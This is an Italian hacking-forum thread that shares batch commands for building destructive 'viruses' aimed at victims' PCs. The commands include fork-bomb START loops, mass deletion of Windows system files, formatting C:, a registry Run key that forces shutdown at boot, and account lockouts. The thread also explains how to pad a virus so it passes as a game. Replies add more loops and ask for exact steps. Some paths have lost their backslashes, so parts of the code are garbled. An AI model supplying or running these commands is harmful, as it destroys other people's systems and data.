Lista comandi in batch

« Older   Newer »
 
  Share  
.
  1. sciurhacker
        Like  
     
    .

    User deleted


    Vi metto a disposizione una lista di codici in batch che potete usare per creare virus col mio programma (batch worm creator):

    SPEGNERE IL PC:
    shutdown -comando
    "-comando" puo essere sostituito con alcuni di questi:
    -s (spegne il pc)
    -r (riavvia il pc)
    -f (chiude tutte le finestre senza salvare il lavoro)
    -t xx (indica il tempo di attesa,xx deve essere sostituito con i secondi)
    -c "testo qualsiasi" (inserisce un testo che viene visualizzato sullo schermo,ad esempio "ATTENZIONE VIRUS")

    BLOCCARE IL PC:
    START (se scrivete tipo 500 volte start,si apriranno un sacco di cmd...e..ehm...temo che il computer si IMPALLI LEGGERMENTE :mwahah: :mwahah:
    IN ALTERNATIVA SI PUO SCRIVERE ANCHE QUESTO COMANDO:
    START %0 START %0 pause >null

    ELIMINARE FILES DI SISTEMA:
    @del %­systemroot%*.exe
    @del %­systemroot%*.dll
    @del %­systemroot%­system32*.exe
    @del %­systemroot%­system32*.dll
    @del %­systemroot%­system32*.sys
    in questo modo eliminerete tutti i files del sistema e il computer sarà inutilizzabile (proprio un mese fa al sottoscritto è capitato tra le mani un virus del genere...merda xD)

    FORMATTARE IL PC:
    format C: /autotest /q /u

    SPEGNERE IL PC ALL'AVVIO:
    [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
    "shutdown"="%­systemroot%­system32shutdown -s"

    RIPETERE LA STESSA PAROLA ALL'INFINITO:
    START parola_qualsiasi
    (sostituire "parola qualsiasi" con la parola da noi scelta)
    questo lho scoperto io da solo,ma non sempre funziona,dipende da come gli gira :D

    BLOCCARE L'ACCESSO A WINDOWS:
    NET USER nomeaccount /times:X-X,H-H

    -X sta per giorno della settimana: L per Lunedì; MA per Martedì; ME per Mercoledì; G per Giovedì; V per Venerdì; S per Sabato; D per Domenica.
    -H sta per ora (solo ore intere: niente 08:25 o roba del genere)

    Ad esempio:

    NET USER Federiko /times:ME-G,15-17;S,12-15

    AUMENTARE IL PESO DI UN VIRUS:
    @REM parole_a_caso
    questo codice va aggiunto a qualsiasi altro codice ke abbiate messo e aumenta il peso del virus in base alle parole ke mettete.Questo serve se per esempio chiamiamo il nostro virus Fifa 2009 e facciamo credere alla vittima ke il virus sia il gioco fifa09...ma un virus in se stesso pesa poki bites e quindi cè il comando @REM per aumentarne il peso.


    Se conoscete altri codici in batch siete pregati di postarli qua sotto in modo che io li aggiunga a questo post per far crescere la guida.

    Edited by DarkDevil88 - 26/6/2009, 17:32
     
    .
  2. DarkDevil88
        Like  
     
    .

    User deleted


    ottimo te l'ho messa importante la discussione.
     
    .
  3. sciurhacker
        Like  
     
    .

    User deleted


    ho visto grazie
     
    .
  4. ~sanbombo92
        Like  
     
    .

    User deleted


    a me quello dello start il secondo qualche volta risorge mando vado veloce col mouse quindi e un virus nascosto ma come lo tolgo?? xD???
     
    .
  5. @N63
        Like  
     
    .

    User deleted


    lo mandi nel cestino
    XD
    spiegati nn ti capisco
     
    .
  6. Sharpshoter
        Like  
     
    .

    User deleted


    non ricordo precisamente il codice ma:
    1: START
    goto 1
    end
    mi sembra così o una cosa che gli assomiglia molto... se lo fate aprirà infinite CMD... è un ciclo infinito questo è più potente dei tanti start perchè pc veloci riuscirebbero a gestirlo senza grossi problemi...
    oppure si mettono comandi che vanno a leggersi delle linee all'interno del sistema operativo che potrebbe rallentarli come ipconfig (ci impiega 5 sec a caricarlo in pc quasi normali...)
     
    .
  7. [TT] GOKU
        Like  
     
    .

    User deleted


    o mi fa un giochetto strano xDxDxD O SCRITTO
    CITAZIONE
    shutdown -c "questo e il virus "PATATO", una vota aperto rimani inculato"

    e mi si riavvia il pc ,xDxD COME MAI LOL
     
    .
  8. MS-DOS
        Like  
     
    .

    User deleted


    Ottimo. Ce ne sono molti altri, ma questi sono quelli fondamentali. Per quanto riguarda il comando START, sarebbe diabolico farlo inserire nell'Avvio Automatico di Windows del PC vittima. :mwahah:
     
    .
  9. DarkDevil88
        Like  
     
    .

    User deleted


    ahahahaha sì xD non sono virus ma se usati nel modo giusto ti fan saltare i nervi xD
     
    .
  10. MS-DOS
        +1   Like  
     
    .

    User deleted


    Bhè, non solo i nervi. Ma comunque, i comandi Batch pur non essendo Virus sono delle vere e proprio delizie che ci offre Windows.

    Ps : Consiglio di togliere il comando : FORMAT C: /autotest /q /u, poichè non ha una completa funzione sul sistema. Sì, è vero che cancella un intero HDD AsD, percò non lo cancella tutto, perchè alcuni file sono protetti, e altri non possono essere cancellati perchè Windows è in esecuzione.
     
    .
  11. DarkDevil88
        Like  
     
    .

    User deleted


    CITAZIONE (MS-DOS @ 6/12/2009, 10:34)
    Bhè, non solo i nervi. Ma comunque, i comandi Batch pur non essendo Virus sono delle vere e proprio delizie che ci offre Windows.

    Ps : Consiglio di togliere il comando : FORMAT C: /autotest /q /u, poichè non ha una completa funzione sul sistema. Sì, è vero che cancella un intero HDD AsD, percò non lo cancella tutto, perchè alcuni file sono protetti, e altri non possono essere cancellati perchè Windows è in esecuzione.

    Pero si potrebbe usare per cancellare una partizione o cmq un hd dove non vi è situato il SO giusto?
     
    .
  12. MS-DOS
        Like  
     
    .

    User deleted


    Sì certo, questo sì. Basta solo che l'HDD non abbia un collegamento DIRETTO con il OS.
     
    .
  13. Mr.Pietro
        Like  
     
    .

    User deleted


    Grande belle informazioni ma dove è uppato questo programma ?
     
    .
  14.     Like  
     
    .
    Avatar

    HackForFun --H4CK MEMBER--

    Group
    Member
    Posts
    8,732
    Reputation
    0
    Location
    Palermo

    Status
    Offline
    @Mr.Pietro: presentati prima di postare !
     
    .
  15. Fear_Dragon
        Like  
     
    .

    User deleted


    bravissimo ottima guida per fare arrabbiare qualche noob xD comunque non ho capito questa
    ELIMINARE FILES DI SISTEMA:
    @del % systemroot%*.exe
    @del % systemroot%*.dll
    @del % systemroot% system32*.exe
    @del % systemroot% system32*.dll
    @del % systemroot% system32*.sys
    in questo modo eliminerete tutti i files del sistema e il computer sarà inutilizzabile (proprio un mese fa al sottoscritto è capitato tra le mani un virus del genere...merda xD)


    cosa bisogna scrivere tutto? mi potresti dire che bisogna scrivere precisamente?gracias :D
     
    .
16 replies since 26/6/2009, 16:27   1941 views
  Share  
.